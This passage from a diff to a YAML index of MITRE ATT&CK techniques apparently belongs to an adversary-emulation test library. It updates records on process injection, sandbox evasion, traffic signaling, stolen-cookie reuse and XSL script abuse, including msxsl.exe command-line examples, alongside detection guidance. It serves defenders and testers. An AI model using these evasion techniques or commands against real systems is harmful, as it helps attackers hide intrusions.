(Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. @@ -41348,11 +33807,9 @@ defense-evasion: modified: '2020-10-22T16:35:53.806Z' created: '2020-10-20T00:06:56.180Z' x_mitre_data_sources: - - Network device run-time memory - - Network device command history - - Network device configuration - - File monitoring - - Network device logs + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Firmware: Firmware Modification' x_mitre_permissions_required: - Administrator x_mitre_detection: |- @@ -41431,10 +33888,9 @@ defense-evasion: x_mitre_defense_bypassed: - Static File Analysis x_mitre_data_sources: - - Anti-virus - - Email gateway - - Network intrusion detection system - - Web logs + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_contributors: - Brian Wiltse @evalstrings - Patrick Campbell, @pjcampbe11 @@ -41472,19 +33928,15 @@ defense-evasion: name: command_prompt T1055.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1055.003 - url: https://attack.mitre.org/techniques/T1055/003 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Thread Execution Hijacking + created: '2020-01-14T01:28:32.166Z' + modified: '2020-11-10T18:29:30.941Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6 description: "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the @@ -41496,29 +33948,29 @@ defense-evasion: can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: - Endgame Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) + Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. " - id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:21:29.233Z' - created: '2020-01-14T01:28:32.166Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User + name: Thread Execution Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.003 + url: https://attack.mitre.org/techniques/T1055/003 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -41527,14 +33979,18 @@ defense-evasion: such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_defense_bypassed: + - Application control + - Anti-virus atomic_tests: [] T1055.005: technique: @@ -41551,7 +34007,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -41578,14 +34034,14 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:23:30.093Z' + modified: '2020-11-10T18:29:30.984Z' created: '2020-01-14T01:30:41.092Z' x_mitre_defense_bypassed: - Anti-virus - Application control x_mitre_data_sources: - - Process monitoring - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -41594,7 +34050,7 @@ defense-evasion: such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " @@ -41605,25 +34061,13 @@ defense-evasion: atomic_tests: [] T1497.003: technique: - created: '2020-03-06T21:11:11.225Z' - modified: '2020-07-01T16:32:02.532Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 - description: "Adversaries may employ various time-based methods to detect and - avoid virtualization and analysis environments. This may include timers or - other triggers to avoid a virtual machine environment (VME) or sandbox, specifically - those that are automated or only operate for a limited amount of time.\n\nAdversaries - may employ various time-based evasions, such as delaying malware functionality - upon initial execution using programmatic sleep commands or native system - scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). - Delays may also be based on waiting for specific victim conditions to be met - (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) - to avoid analysis and scrutiny. " + description: |- + Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time. + + Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. + + Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks) name: Time Based Evasion created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -41632,6 +34076,18 @@ defense-evasion: - source_name: mitre-attack external_id: T1497.003 url: https://attack.mitre.org/techniques/T1497/003 + - source_name: ISACA Malware Tricks + url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes + description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How + Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-01T15:48:28.345Z' + created: '2020-03-06T21:11:11.225Z' x_mitre_platforms: - Linux - macOS @@ -41639,8 +34095,9 @@ defense-evasion: x_mitre_contributors: - Deloitte Threat Library Team x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: 'Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain @@ -41651,7 +34108,7 @@ defense-evasion: being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ' x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_defense_bypassed: - Host forensic analysis - Signature-based detection @@ -41688,9 +34145,8 @@ defense-evasion: - macOS - Windows x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Modification' + - 'File: File Metadata' x_mitre_detection: 'Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring @@ -41973,10 +34429,8 @@ defense-evasion: x_mitre_platforms: - Windows x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_detection: |- If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) @@ -42017,18 +34471,18 @@ defense-evasion: elevation_required: true T1205: technique: - revoked: false - id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Traffic Signaling - description: |- - Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. - - Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). - - The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. - - On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. + created: '2018-04-18T17:59:24.739Z' + modified: '2021-02-17T14:23:49.495Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1205 @@ -42049,37 +34503,54 @@ defense-evasion: url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T15:30:44.964Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_contributors: - - Josh Day, Gigamon - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - x_mitre_permissions_required: - - User + - source_name: Bleeping Computer - Ryuk WoL + url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ + description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan + To Encrypt Offline Devices. Retrieved February 11, 2021. + - source_name: AMD Magic Packet + url: https://www.amd.com/system/files/TechDocs/20213.pdf + description: AMD. (1995, November 1). Magic Packet Technical White Paper. + Retrieved February 17, 2021. + - source_name: GitLab WakeOnLAN + url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN + description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February + 17, 2021. + description: |- + Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. + + Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). + + The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + + On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. + + Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) + name: Traffic Signaling + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c + revoked: false + x_mitre_is_subtechnique: false + x_mitre_version: '2.2' + x_mitre_defense_bypassed: + - Defensive network service scanning + x_mitre_detection: |- + Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. + + The Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN) + x_mitre_network_requirements: true x_mitre_platforms: - Linux - macOS - Windows - Network - x_mitre_network_requirements: true - x_mitre_detection: Record network packets sent to and from the system, looking - for extraneous packets that do not belong to established flows. - x_mitre_defense_bypassed: - - Defensive network service scanning - x_mitre_version: '2.1' - x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_contributors: + - Josh Day, Gigamon atomic_tests: [] T1127: technique: @@ -42120,15 +34591,15 @@ defense-evasion: kill_chain_phases: - phase_name: defense-evasion kill_chain_name: mitre-attack - modified: '2020-06-20T22:43:41.298Z' + modified: '2021-03-05T22:25:49.118Z' created: '2017-05-31T21:31:39.262Z' x_mitre_version: '1.2' x_mitre_contributors: - Casey Smith - Matthew Demaske, Adaptforward x_mitre_data_sources: - - File monitoring - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_defense_bypassed: - Application control x_mitre_detection: |- @@ -42149,7 +34620,7 @@ defense-evasion: Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected. - A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. For example, AWS GuardDuty is not supported in every region.(Citation: AWS Region Service Table) + A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions) name: Unused/Unsupported Cloud Regions @@ -42157,35 +34628,27 @@ defense-evasion: object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - - external_id: T1535 - source_name: mitre-attack + - source_name: mitre-attack + external_id: T1535 url: https://attack.mitre.org/techniques/T1535 - - source_name: AWS Region Service Table - url: https://aws.amazon.com/about-aws/global-infrastructure/regional-product-services/ - description: Amazon. (2019, October 22). Region Table. Retrieved October 22, - 2019. - - source_name: CloudSploit - Unused AWS Regions - url: https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc - description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. + - description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019. + url: https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc + source_name: CloudSploit - Unused AWS Regions type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-14T19:17:44.563Z' + modified: '2021-04-22T16:46:43.876Z' created: '2019-09-04T14:35:04.617Z' x_mitre_is_subtechnique: false x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS x_mitre_contributors: - Netskope - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs + - 'Instance: Instance Creation' x_mitre_permissions_required: - User x_mitre_detection: 'Monitor system logs to review activities occurring across @@ -42239,9 +34702,9 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:44.714Z' + modified: '2021-04-14T18:09:47.427Z' created: '2020-01-30T16:18:36.873Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_defense_bypassed: - System Access Controls @@ -42257,13 +34720,16 @@ defense-evasion: user has an active login session but has not entered the building or does not have VPN access).' x_mitre_data_sources: - - Office 365 audit logs - - OAuth audit logs - - Authentication logs + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' + - 'User Account: User Account Authentication' + - 'Active Directory: Active Directory Credential Request' x_mitre_platforms: - Windows - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1497.002: technique: @@ -42331,8 +34797,9 @@ defense-evasion: other forms of Discovery, especially in a short period of time, may aid in detection. ' x_mitre_data_sources: - - Process command-line parameters - - Process use of network + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_contributors: - Deloitte Threat Library Team x_mitre_platforms: @@ -42400,8 +34867,8 @@ defense-evasion: If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020) x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'Script: Script Execution' + - 'File: File Content' x_mitre_contributors: - Rick Cole, FireEye x_mitre_platforms: @@ -42492,8 +34959,8 @@ defense-evasion: it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " x_mitre_data_sources: - - System calls - - Process monitoring + - 'Process: OS API Execution' + - 'Module: Module Load' x_mitre_platforms: - Linux x_mitre_is_subtechnique: true @@ -42535,14 +35002,12 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-19T16:01:22.724Z' + modified: '2021-04-12T18:27:52.298Z' created: '2017-05-31T21:31:00.645Z' - x_mitre_version: '2.1' + x_mitre_version: '2.2' x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_defense_bypassed: - Firewall - Host intrusion prevention systems @@ -42561,16 +35026,17 @@ defense-evasion: - User - Administrator x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - SaaS - - Office 365 - - Azure AD + - Google Workspace + - Containers x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team - Netskope - Mark Wee - Praetorian @@ -42642,10 +35108,8 @@ defense-evasion: may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications. x_mitre_data_sources: - - Process use of network - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_contributors: - Rodrigo Garcia, Red Canary x_mitre_platforms: @@ -42653,14 +35117,6 @@ defense-evasion: atomic_tests: [] T1497: technique: - created: '2019-04-17T22:22:24.505Z' - modified: '2020-07-01T16:32:02.272Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d description: "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the @@ -42691,6 +35147,14 @@ defense-evasion: description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-21T15:16:10.835Z' + created: '2019-04-17T22:22:24.505Z' x_mitre_is_subtechnique: false x_mitre_defense_bypassed: - Anti-virus @@ -42705,8 +35169,9 @@ defense-evasion: - macOS - Linux x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should @@ -42751,7 +35216,7 @@ defense-evasion: modified: '2020-10-21T22:37:49.258Z' created: '2020-10-19T18:47:08.759Z' x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network x_mitre_detection: There is no documented method for defenders to directly identify @@ -42780,7 +35245,7 @@ defense-evasion: source_name: Pass The Cookie - source_name: Unit 42 Mac Crypto Cookies January 2019 url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ - description: Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 @@ -42789,7 +35254,7 @@ defense-evasion: description: |- Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie) - Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform. + Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform. There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019) id: attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0 @@ -42799,9 +35264,9 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:44.527Z' + modified: '2021-04-14T13:21:37.474Z' created: '2020-01-30T17:48:49.395Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls @@ -42809,13 +35274,14 @@ defense-evasion: applications by the same user in different locations or by different systems that do not match expected configurations. x_mitre_data_sources: - - Office 365 audit logs - - Authentication logs + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' x_mitre_contributors: - Johann Rehberger x_mitre_platforms: - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1222.001: technique: @@ -42871,10 +35337,10 @@ defense-evasion: Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014) x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + - 'File: File Metadata' x_mitre_platforms: - Windows identifier: T1222.001 @@ -43061,7 +35527,7 @@ defense-evasion: * msxsl.exe script[.]xsl script[.]xsl * msxsl.exe script[.]jpeg script[.]jpeg - Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) + Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic) @@ -43104,7 +35570,7 @@ defense-evasion: kill_chain_phases: - phase_name: defense-evasion kill_chain_name: mitre-attack - modified: '2020-06-20T22:45:46.479Z' + modified: '2021-02-09T15:07:00.842Z' created: '2018-10-17T00:14:20.652Z' x_mitre_is_subtechnique: false x_mitre_system_requirements: @@ -43122,10 +35588,8 @@ defense-evasion: - Application control - Digital Certificate Validation x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Process use of network - - DLL monitoring + - 'Process: Process Creation' + - 'Module: Module Load' x_mitre_contributors: - Avneet Singh - Casey Smith @@ -43257,9 +35721,10133 @@ defense-evasion: ' name: command_prompt +persistence: + T1546.008: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.008 + url: https://attack.mitre.org/techniques/T1546/008 + - external_id: CAPEC-558 + source_name: capec + url: https://capec.mitre.org/data/definitions/558.html + - url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html + description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: + Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.' + source_name: FireEye Hikit Rootkit + - url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom + description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to + the Kingdom. Retrieved July 5, 2017. + source_name: DEFCON2016 Sticky Keys + - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ + description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. + Retrieved November 12, 2014. + source_name: Tilbury 2014 + - source_name: Narrator Accessibility Abuse + url: 